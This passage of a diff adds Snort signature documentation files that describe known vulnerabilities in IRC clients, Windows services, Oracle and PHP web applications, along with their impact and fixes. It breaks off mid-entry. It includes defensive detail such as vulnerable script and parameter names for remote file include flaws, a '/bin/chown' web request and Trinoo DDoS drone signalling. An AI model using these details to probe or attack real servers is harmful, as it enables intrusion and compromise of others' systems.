+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+--
--- /dev/null
+++ b/doc/signatures/307.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 307
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Chocoa IRC client.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code on the client.
+
+--
+Detailed Information:
+It is possible for a malicious attacker to exploit a vulnerability in the Chocoa IRC client by setting an IRC channel topic specially designed to cause a buffer overflow.
+
+Affected Systems:
+	Fujitsu Chocoa 1.0 beta 7r for Windows 9x and NT.
+
+
+--
+Attack Scenarios:
+The attacker would need to set a specially crafted IRC channel topic to cause the overflow.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0672
+
+Bugtraq:
+http://www.securityfocus.com/bid/573
+
+--
--- /dev/null
+++ b/doc/signatures/3449.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3449
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000394.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000394
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "search.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2962.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2962
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/100000473.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000473
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "language.php" with SQL commands being passed as the "Action" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "Action" parameter in the "language.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1994.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1994
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1338.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1338
+
+--
+Summary:
+Attempted chown command access via web
+
+--
+Impact:
+Attempt to change file ownership permissions on a webserver.
+
+--
+Detailed Information:
+This is an attempt to change file ownership permissions on a machine.
+Using thiscommand an attacker may change the permissions of a file to
+suit his ownneeds, make a file owned by another user who would
+otherwise not havethese special permissions.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/chown'
+in the URI whichcan then change file permissions of files present on
+the host.Thiscommand may also be requested on a command line should
+the attacker gainaccess to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin.Whenever possible,
+sensitive files andcertain areas of the filesystem should have the
+system immutable flagset to negate the use of the chown command. On
+BSD derived systems,setting the systems runtime securelevel also
+prevents the securelevelfrom being changed. (note: the securelevel can
+only beincreased)
+
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1336
+sid: 1337
+
+man chown
+
+--
--- /dev/null
+++ b/doc/signatures/3368.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3368
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2712.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2712
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_instantiation
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/233.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+233
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1232.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1232
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3366.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3366
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000506.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000506
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "api_metaweblog.inc.php" using a remote file being passed as 
+the "DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "api_metaweblog.inc.php" 
+script used by the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000451.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000451
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "cat" parameter in the "album.asp" script used 
+by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1737.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1737
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000335.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000335
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CaLogic Calendars" application running on a webserver. Access to the file "srxclr.php" using a remote file being passed as the "CLPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CLPath" parameter in the "srxclr.php" script used by the "CaLogic Calendars" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CaLogic Calendars
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000403.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000403
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "directory.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "directory.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/565.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+565
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2042.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2042
+
+--
+Summary:
+This event is generated when a successful attempt has been made to login
+using XTACACS from a machine outside the local area network.
+
+--
+Impact:
+This may be an attempt to access resources controlled by the XTACACS 
+server. Data compromize may occur.
+
+--
+Detailed Information:
+The Extended Terminal Access Controller Access Control System (XTACACS) 
+is an authentication and authorization protocol derived from  CISCO 
+TACACS. It is used in tcp/ip networks where network servers authenticate
+clients from a master server.
+
+When a user logs in to a server that uses XTACACS the server then makes 
+a request to a master server to detrmine the validity of the request. 
+The master server then verifies the login attempt and returns data 
+concerning that user which may include information regarding resources 
+the user is allowed access to in the form of an access list.
+
+--
+Affected Systems:
+All servers using XTACACS for authentication control.
+
+--
+Attack Scenarios:
+Regular user login method.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+XTACACS servers should only authenticate to known hosts and firewall 
+rules should prevent access to XTACACS enabled servers from outside the 
+local area network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Information Library - Intel:
+http://www.intel.com/support/si/library/bi0414.htm
+
+The Internet Next Generation Project:
+http://ing.ctit.utwente.nl/WU5/D5.1/Technology/xtacacs/
+
+--
--- /dev/null
+++ b/doc/signatures/2682.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2682
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_geom
+. This procedure is included in
+mdsys.md2.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000350.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000350
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "UBBThreads" application running on a webserver. Access to the file "ubbt.inc.php" using a remote file being passed as the "GLOBALS[thispath]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
